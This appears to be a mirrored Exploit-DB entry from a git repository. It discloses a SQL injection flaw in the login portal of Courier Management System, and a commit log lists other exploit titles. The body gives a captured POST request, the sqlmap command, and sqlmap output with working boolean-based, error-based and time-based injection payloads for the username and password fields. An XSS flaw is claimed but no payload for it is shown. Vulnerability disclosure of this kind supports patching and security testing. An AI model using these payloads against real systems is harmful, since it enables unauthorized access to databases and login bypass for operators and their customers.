bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/41113.txt
Offensive Security ef112ace5d DB: 2017-01-19 
27 new exploits

SentryHD 02.01.12e - Privilege Escalation

Linux/x86-64 - mkdir Shellcode (25 bytes)

ownrs blog beta3 - SQL Injection / Cross-Site Scripting
OwnRS blog beta3 - SQL Injection / Cross-Site Scripting

Dodo's Quiz Script 1.1 - (dodosquiz.php) Local File Inclusion
Dodo's Quiz Script 1.1 - Local File Inclusion

Mambo Component SOBI2 RC 2.8.2 - (bid) SQL Injection
Mambo Component SOBI2 RC 2.8.2 - SQL Injection

Joomla! Component com_pcchess - (game_id) Blind SQL Injection
Joomla! Component com_pcchess - Blind SQL Injection
Medical Clinic Website Script - SQL Injection
Fileserve Clone Script - Authentication Bypass
Auction Website Script - SQL Injection
Wetransfer Clone Script - Authentication Bypass
Finance Website Script - SQL Injection
Justdial Clone Script - Authentication Bypass
Business Directory Script - SQL Injection
Buy and Sell Market Place Software - SQL Injection
Dentist Website Script - SQL Injection
Manufacturer Website Design Script - SQL Injection
Micro Blog Script - SQL Injection
My Private Tutor Website Builder Script - SQL Injection
NGO Directory Script - SQL Injection
Yoga and Fitness Website Script - SQL Injection
NGO Website Script - SQL Injection
Questions and Answers Script 1.1.3 - SQL Injection
Online Mobile Recharge Script - SQL Injection
Clone of Oddee Script 1.1.3 - SQL Injection
Online Printing Business Clone Script - SQL Injection
Online Tshirt Design Script - SQL Injection
Shiksha Educational Website Script - SQL Injection
Study Abroad Educational Website Script - SQL Injection
Courier Management System - SQL Injection
Flippa Website Script - SQL Injection
B2B Script 4.27 - SQL Injection
2017-01-19 05:01:18 +00:00

67 lines
3.7 KiB
Text
Executable file
Raw Blame History

# Title : Courier Management System - Sql Injection and non-persistent XSS login portal
# Date: 17 January 2017
# Exploit Author: Sibusiso Sishi sibusiso@ironsky.co.za
# Tested on: Windows7 x32
# Vendor: http://couriermanageme.sourceforge.net/
# Version: not supplied
# Download Software: https://sourceforge.net/projects/couriermanageme/files/
#################################################
## About The Product : ##
Courier Management System is the simplest solution for Courier & Cargo Tracking Business. If you need to enable Tracking Option in your existing or new website, this is quickest Software Solution.You can get install it yourselves or We do the installation and brand it in your name on your hosting.The Courier Software is Very easy to setup and manage powerful administration. Provide online tracking system of consignment and shipping detail for International or domestic shipping
## Vulnerability : ##
The login portal is vulnerable to SQLi and cross-site scripting attacks
-HTTP Method : POST
POST /cms/login.php HTTP/1.1
Host: 192.168.19.135
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.19.135/cms/login.php
Cookie: PHPSESSID=q446r5fqav1qlljb7cohd29r85
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
txtusername=test&txtpassword=test&OfficeName=Fast+Courier+-+Jalgaon&Submit=Login+Now
- Sqlmap command: sqlmap -r exploit.txt
- Sqlmap Output :
sqlmap identified the following injection point(s) with a total of 824 HTTP(s) requests:
---
Parameter: txtpassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: txtusername=test&txtpassword=test' OR NOT 5887=5887#&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: txtusername=test&txtpassword=test' AND (SELECT 9962 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT (ELT(9962=9962,1))),0x717a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- CqJl&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: txtusername=test&txtpassword=test' OR SLEEP(5)-- VMai&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
Parameter: txtusername (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: txtusername=test' RLIKE (SELECT (CASE WHEN (9742=9742) THEN 0x74657374 ELSE 0x28 END))-- FJke&txtpassword=test&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: txtusername=test' AND (SELECT 6984 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT (ELT(6984=6984,1))),0x717a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nDYx&txtpassword=test&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: txtusername=test' AND (SELECT * FROM (SELECT(SLEEP(5)))Aols)-- LarG&txtpassword=test&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
---
[16:59:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.6.24
back-end DBMS: MySQL >= 5.0
Reference in a new issue View git blame Copy permalink